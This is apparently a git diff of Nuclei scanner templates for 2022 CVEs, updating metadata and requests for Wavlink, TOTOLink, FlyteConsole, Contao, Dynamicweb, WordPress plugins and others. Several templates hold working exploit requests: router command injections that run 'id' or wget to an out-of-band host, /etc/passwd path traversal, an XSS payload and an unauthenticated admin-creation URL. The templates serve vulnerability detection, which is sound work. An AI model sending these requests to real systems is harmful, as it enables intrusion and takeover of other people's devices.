FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. - impact: | - An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks. - remediation: | - The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. reference: - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 - https://github.com/flyteorg/flyteconsole/pull/389 - https://hackerone.com/reports/1540906 - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 - - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709 + remediation: | + The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 - epss-score: 0.08397 - epss-percentile: 0.94255 - cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: flyte - product: flyte_console - tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte - -http: + tags: cve,cve2022,flyteconsole,ssrf,oss +requests: - method: GET path: - - "{{BaseURL}}/cors_proxy/https://oast.me/" - + - "{{BaseURL}}/cors_proxy/https://www.interact.sh" matchers: - type: word words: - "Interactsh Server" -# digest: 490a00463044022011000b62bbdc9d5f28cdb1540f0177002809856e4f065b19296986952d6abac5022034c9d32e197b3f27d3f1d38e02891c4f95987145301f02da2555758516aef94e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml index bf397b6486..2c3533d673 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml @@ -1,16 +1,14 @@ id: CVE-2022-2486 - info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection + name: Wavlink Mesh.cgi - Remote Code Execution author: For3stCo1d severity: critical description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - https://vuldb.com/?id.204537 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2486 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -20,22 +18,17 @@ info: shodan-query: http.title:"Wi-Fi APP Login" verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast - requests: - raw: - | - GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1 + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: status status: - 500 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml index 10b7510a7e..899076eb8b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml @@ -1,39 +1,26 @@ id: CVE-2022-2487 - info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection + name: Wavlink Nightled.cgi - Remote Code Execution author: For3stCo1d severity: critical description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - https://vuldb.com/?id.204538 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2487 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.97404 - epss-percentile: 0.99916 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" - -http: +requests: - raw: - | @timeout: 10s @@ -42,7 +29,6 @@ http: Content-Type: application/x-www-form-urlencoded page=night_led&start_hour=;{{cmd}}; - matchers-condition: and matchers: - type: word @@ -50,14 +36,7 @@ http: words: - "uid=" - "gid=" - - "nightStart" condition: and - - - type: word - words: - - text/html - - type: status status: - 200 -# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2488.yaml b/nuclei-templates/CVE-2022/CVE-2022-2488.yaml deleted file mode 100644 index f4e04da2f6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2488.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-2488 - -info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection - author: For3stCo1d - severity: critical - description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 - - https://vuldb.com/?id.204539 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2488 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast - -requests: - - raw: - - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24899.yaml b/nuclei-templates/CVE-2022/CVE-2022-24899.yaml deleted file mode 100644 index 9b8518686b..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24899.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-24899 - -info: - name: Contao <4.13.3 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. - reference: - - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 - remediation: As a workaround, users may disable canonical tags in the root page settings. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24899 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Contao" - tags: cve,cve2022,contao,xss,huntr - -requests: - - method: GET - path: - - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - '"Not authenticated"' - condition: and - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml b/nuclei-templates/CVE-2022/CVE-2022-24900.yaml index 5197c4d2ea..9f2945210d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24900.yaml @@ -1,47 +1,33 @@ id: CVE-2022-24900 - info: name: Piano LED Visualizer 1.3 - Local File Inclusion author: 0x_Akoko severity: high description: | Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. - impact: | - An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. - remediation: | - Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. reference: - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 - https://vuldb.com/?id.198714 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 + - https://www.cvedetails.com/cve/CVE-2022-24900/ - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2022-24900 - cwe-id: CWE-668,CWE-22 - epss-score: 0.00999 - epss-percentile: 0.81936 - cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: piano_led_visualizer_project - product: piano_led_visualizer - tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project - -http: + cwe-id: CWE-610 + tags: cve,cve2022,lfi,piano,iot,oss +requests: - method: GET path: - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25082.yaml b/nuclei-templates/CVE-2022/CVE-2022-25082.yaml index d0cd95fd1a..5c748465de 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25082.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25082.yaml @@ -6,25 +6,35 @@ info: severity: critical description: | TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. + remediation: | + Apply the latest firmware update provided by the vendor to fix the command injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25082 - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25082 - cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce,iot - + cwe-id: CWE-78 + epss-score: 0.0417 + epss-percentile: 0.92009 + cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: totolink + product: a950rg_firmware + tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive variables: cmd: "`ls>../{{randstr}}`" -requests: +http: - raw: - | GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1 Host: {{Hostname}} - - | GET /{{randstr}} HTTP/1.1 Host: {{Hostname}} @@ -34,17 +44,16 @@ requests: - type: word part: body_2 words: - - ".sh" - - ".cgi" + - .sh + - .cgi condition: and - type: word part: header_2 words: - - 'application/octet-stream' + - application/octet-stream - type: status status: - 200 - -# Enhanced by mp on 2022/11/05 +# digest: 4a0a00473045022100ab2d16fe98044552f6b033c5d66ef9d749c2577f4ba89980e3804e6e0961c42002204911d612998bfb262eb6fdacd0a6fc2a9e74331eeba778603ed15a039ec9d16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25125.yaml b/nuclei-templates/CVE-2022/CVE-2022-25125.yaml index 043246a510..913fdf5257 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25125.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25125.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4. reference: @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25125 cwe-id: CWE-89 - epss-score: 0.02852 - epss-percentile: 0.8963 + epss-score: 0.02031 + epss-percentile: 0.87716 cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2022,sqli,mcms + tags: cve,cve2022,sqli,mcms,mingsoft variables: num: "999999999" @@ -50,4 +52,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100c6463ded266946d46e2edb0a67c89eb88904eef7cf2be96f58cac0c75c29ccac022100a9cee00f6555f1de90a5503b62555fc3017f026c17d45980ef3dc5a0f4d43484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082b6a248202fef50a86c36616626d308355488ad6aa5d4ef24b183158f17b9b0022006b63a9e980e50f042f60dbe4457b4bd55a23a77f4cc51ce5d2057ae661a61b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25148.yaml b/nuclei-templates/CVE-2022/CVE-2022-25148.yaml index e1310c33f3..c60b1f9c37 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25148.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25148.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25148 cwe-id: CWE-89 epss-score: 0.10089 - epss-percentile: 0.9433 + epss-percentile: 0.94364 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics - tags: packetstorm,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: @@ -57,4 +57,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a004730450220323da4ba93cc81baeafe1e713917846901f30b6c212d2cb8cf6ce7a7c2c22e65022100c2c6d5a4606e2cc8df6b4cf540732b9b3eba9ec1abc5b8ba02f0cbee0022c1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca848fcb45e23d7d210462b4aa7c89510aa622fe4bb4c0639f5035c1e09b2a5902205b9422a4700bd06f51bc7edd9a951403e9ad2145500336c3690f7beed9414f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25149.yaml b/nuclei-templates/CVE-2022/CVE-2022-25149.yaml index c5bf84fee7..3ee911d449 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25149.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25149.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25149 cwe-id: CWE-89 - epss-score: 0.34697 - epss-percentile: 0.96694 + epss-score: 0.36793 + epss-percentile: 0.97067 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: wp_statistics framework: wordpress publicwww-query: "/wp-content/plugins/wp-statistics/" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: @@ -56,5 +56,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true - -# digest: 490a0046304402201bcfedf1e44cd62ccf0a31748b144dcf32170e93840348b01dbad2c1231a925f0220173607066561060333509d86c67f35b458792c76063fa62ed4dfc5dd910c37ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f3ab364d23921ccdb931455c9ebd80865bd26ddd8d85a85e5c2f6fc86842424e022068720cfe546b2bb14a734450dfc5bdad56751bcdaef77f99acb548fddcb1ac38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml b/nuclei-templates/CVE-2022/CVE-2022-25323.yaml deleted file mode 100644 index 4500863480..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-25323 - -info: - name: ZEROF Web Server 2.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. - reference: - - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - tags: xss,cve,cve2022,zerof - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2022-25323 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/admin.back" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'back' - condition: and - - - type: status - status: - - 401 - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2535.yaml b/nuclei-templates/CVE-2022/CVE-2022-2535.yaml index 5054d69415..1f9bd68c13 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2535.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2535.yaml @@ -10,13 +10,14 @@ info: reference: - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02 - https://nvd.nist.gov/vuln/detail/CVE-2022-2535 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2535 cwe-id: CWE-639 - epss-score: 0.00271 - epss-percentile: 0.64341 + epss-score: 0.00198 + epss-percentile: 0.56687 cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: product: searchwp_live_ajax_search framework: wordpress publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: - method: GET @@ -39,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "searchwp-live-search-result")' condition: and -# digest: 490a004630440220524b9cb9dedd5532a69a351575996f8464fb2fce059b85f4398980f70f77bde50220678216cae0fc38768e67acbf4502593df797e5f85fc2dc605c06ae44282e0327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c29befeae02b026b93a42c98ea54d1b6f5efaa102360055dbea4e7481f39b2f022100ad34ac1dc40f5d04fff554cad7674c9ca60fdd3db66a66b792e9e79ff14bca98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25356.yaml b/nuclei-templates/CVE-2022/CVE-2022-25356.yaml index 32725a1f9a..318df7ba5a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25356.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25356.yaml @@ -1,27 +1,38 @@ id: CVE-2022-25356 info: - name: Alt-N MDaemon Security Gateway - XML Injection + name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection author: Akincibor severity: medium description: | - In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys. + Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation. + remediation: | + Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. reference: - https://www.swascan.com/security-advisory-alt-n-security-gateway/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 - https://www.altn.com/Products/SecurityGateway-Email-Firewall/ - https://www.swascan.com/security-blog/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25356 cwe-id: CWE-91 + epss-score: 0.00425 + epss-percentile: 0.73853 + cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: altn + product: securitygateway google-query: inurl:"/SecurityGateway.dll" - verified: "true" tags: cve,cve2022,altn,gateway,xml,injection -requests: +http: - method: GET path: - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1' @@ -39,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207eaf7f3b8339b01fbf9d09efa0a1c48df53a4c44ce469786dd22d682531bb04d022100b158dfc406ffdb342ad75451f95e9b78f8fa9072ec60c97cfcb702e67a2736f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25369.yaml b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml index 27006db770..38ab8f6953 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25369.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml @@ -5,20 +5,21 @@ info: author: pdteam severity: critical description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. - remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0." + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' reference: - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 - metadata: - shodan-query: http.component:"Dynamicweb" - tags: cve,cve2022,dynamicweb,rce,unauth classification: - cve-id: CVE-2022-25369 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2022-25369 cwe-id: CWE-425 + metadata: + max-request: 1 + shodan-query: http.component:"Dynamicweb" + tags: cve2022,cve,dynamicweb,rce,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" @@ -43,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022100b7f35452dbfcd48834f3400c73dcf201cc3872265ccf60c523480c1d6cee56fd02202c82c05a62a41f20bff8ca897e0fbf249b14b87a0da1aa8d03aebb40c626803d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2544.yaml b/nuclei-templates/CVE-2022/CVE-2022-2544.yaml index 4e2dd15049..e69d88d917 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2544.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2544.yaml @@ -5,27 +5,40 @@ info: author: tess severity: high description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes. + impact: | + An attacker can access sensitive files and potentially obtain sensitive information from the target system. + remediation: | + Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544 - https://nvd.nist.gov/vuln/detail/CVE-2022-2544 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2544 cwe-id: CWE-425 + epss-score: 0.00551 + epss-percentile: 0.7513 + cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp + max-request: 2 + vendor: wpmanageninja + product: ninja_job_board + framework: wordpress + tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja -requests: +http: - method: GET path: - "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/" - "{{BaseURL}}/wp-content/uploads/wpjobboard/" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100c3064d8709e47d8bc7b434502a27234fba508fca7c1339c6d99d091e98228c08022100d2289a0c1c442dc09404549115ed1975e200909c8473604550aa76083464a23d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2546.yaml b/nuclei-templates/CVE-2022/CVE-2022-2546.yaml index c6e9df6c1e..a8a68d14b5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2546.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2546.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58 - https://wordpress.org/plugins/all-in-one-wp-migration/ - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://github.com/0xvinix/CVE-2022-2546 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.7 cve-id: CVE-2022-2546 cwe-id: CWE-79 + epss-score: 0.00252 + epss-percentile: 0.64447 + cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: 